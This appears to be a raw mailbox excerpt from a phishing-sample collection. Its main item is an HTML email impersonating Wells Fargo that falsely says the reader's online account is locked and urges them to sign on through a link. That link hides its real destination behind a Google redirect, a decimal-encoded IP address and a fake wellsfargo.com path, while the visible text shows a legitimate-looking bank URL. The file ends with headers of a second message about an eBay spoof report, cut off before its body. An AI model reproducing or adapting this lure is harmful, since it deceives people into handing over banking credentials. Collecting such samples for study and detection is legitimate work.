From: "Wells Fargo" <service@wellsfargo.com>
Reply-To: "Wells Fargo" <service@wellsfargo.com>
To: nobody@example.com
Subject: Update Your Wells Fargo Accounts
Date: Thu, 23 Mar 2006 06:16:29 +0600
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--6300884722123669138"
X-Priority: 1
X-MSMail-Priority: High
Status: O
X-Status: 
X-Keywords:                  
X-UID: 673

----6300884722123669138
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<DIV><A href=3D"http://www.google.com/url?sa=3DX&oi=3Ddict&q=3Dhttp://3578=
903115/html/..%20/www.wellsfargo.com/update-wells-info/" target=3D_blank><=
IMG id=3Dlogo height=3D62 alt=3D"Wells Fargo Home Page" src=3D"http://www.=
wellsfargo.com/img/header/logo_62sq.gif" width=3D62><IMG id=3Dcoach height=
=3D62 alt=3D"Wells Fargo Home Page" src=3D"http://www.wellsfargo.com/img/h=
eader/coach.gif" width=3D98></A></DIV>
<DIV><B><FONT size=3D4>Update Your Wells Fargo Accounts</FONT></B></DIV>
<DIV><B>Dear customer:</B></DIV>
<DIV><B>We've noticed that you experienced trouble logging into Wells Farg=
o Online Banking.</B></DIV>
<DIV><B>After three unsuccessful attempts to access your account, your Wel=
ls Fargo Online Profile has been locked. This has been done to secure your=
 accounts and protect your private information. Wells Fargo is committed t=
o making sure that your online transactions are secure.</B></DIV>
<DIV><B>To unlock your account, and verify your identity please follow thi=
s link and&nbsp; Sign On&nbsp; </B><A href=3D"http://3578903115/html/..=
%20/www.wellsfargo.com/update-wells-info/" target=3D_blank><INPUT style=3D=
"BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium n=
one; BORDER-BOTTOM: medium none" tabIndex=3D4 type=3Dimage height=3D21 alt=
=3D"Sign On" width=3D64 src=3D"https://a248.e.akamai.net/7/248/1856/90m/ww=
w.wellsfargo.com/img/individuals/al_signon_over.gif" onfiltered=3D"this.sr=
c=3Dhttp://3578903115/html/..%20/www.wellsfargo.com/update-wells-info/" ? =
update-wells-info wellsfargo .https.online.wellsfargo.com image firelinero=
cks.com http:><FONT color=3D#003399>http://www.wellsfargo.com/help/index.j=
html </FONT></A></DIV>
<DIV><B><U>Sincerely,</U></B></DIV>
<DIV><U><B>Wells Fargo</B></U></DIV>
<DIV><U><B>Online Customer Service</B></U></DIV>
<DIV>&nbsp;</DIV>
<DIV style=3D"WIDTH: 766px" align=3Dcenter>
<DIV id=3Dcopyright align=3Dleft>=A9 1999 - 2006 Wells Fargo. All rights r=
eserved. Member FDIC.</DIV>
<DIV id=3Dnotnot align=3Dleft><STRONG>Brokerage Products: Not FDIC Insured=
 =95 No Bank Guarantee =95 May Lose Value</STRONG></DIV>
<DIV id=3Ddisclosure align=3Dleft>Brokerage is offered through Wells Fargo=
 Investments, LLC (member SIPC), a non-bank affiliate of Wells Fargo &amp;=
 Company and is intended only for United States residents. System response=
 and account access times may vary due to a variety of factors.</DIV></DIV=
>
<DIV style=3D"MARGIN-TOP: 25px; FONT-WEIGHT: bold; FONT-SIZE: 75=
%; WIDTH: 772px" align=3Dcenter>
<DIV align=3Dleft><IMG style=3D"BORDER-RIGHT: medium none; PADDING-RIGHT: =
5px; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: med=
ium none" height=3D10 alt=3D"" src=3D"https://a248.e.akamai.net/7/248/1856=
/90m/www.wellsfargo.com/images/individuals/al_ehl_house_gen.gif" width=3D1=
4>Equal Housing Lender</DIV></DIV>

----6300884722123669138--

From spoof@ebay.de  Wed Mar 22 20:00:33 2006
Return-Path: <spoof@ebay.de>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 38196537096
	for <nobody@login.example.com>; Wed, 22 Mar 2006 20:00:33 -0500 (EST)
Received: from mx48.sjc.ebay.com (mxpool23.ebay.com [66.135.197.29])
	by mail2.example.com (Postfix) with ESMTP id E08446FA3E2
	for <nobody@example.com>; Wed, 22 Mar 2006 20:00:32 -0500 (EST)
Received: from smf-klm-02.corp.ebay.com (smf-klm-02.corp.ebay.com [10.108.116.101])
	by mx48.sjc.ebay.com (8.13.5/8.13.5) with ESMTP id k2N10Qxc028182;
	Wed, 22 Mar 2006 17:00:31 -0800
DomainKey-Signature: a=rsa-sha1; s=dk; d=ebay.de; c=nofws; q=dns;
	h=received:date:to:subject:from:reply-to:mime-version:
	content-type:content-transfer-encoding:x-mailer:message-id;
	b=v7thLB0/gb0qVkUFRFFGoqKHTCpwdTsyaTVOIvZ7dd6l/QBuOgVP7juJu9SVdBCvN
	Rcl/0Mlsjk+aZnKDDwK02imHSyFl6Is8dzUnMqmYelscKqbNEj5vI9PN4qQAmdxnFo2
	0UIA/U9yeJFfyYAZiQ+WMWBoG+rETtMZS4AkdIo=
Received: from [10.244.21.70] (HELO usa-keuae-003.corp.ebay.com)
  by smf-klm-02.corp.ebay.com (CommuniGate Pro SMTP 4.1.5)
  with SMTP id 122387043; Wed, 22 Mar 2006 17:00:47 -0800
Date: Wed, 22 Mar 2006 17:00:47 -0800
To: Jose Nazario <nobody@example.com>
Subject: RE: IV%ORC055 SPG - Ihr Hinweis an eBay Sicherheit.   (KMM10641445V75630L0KM)
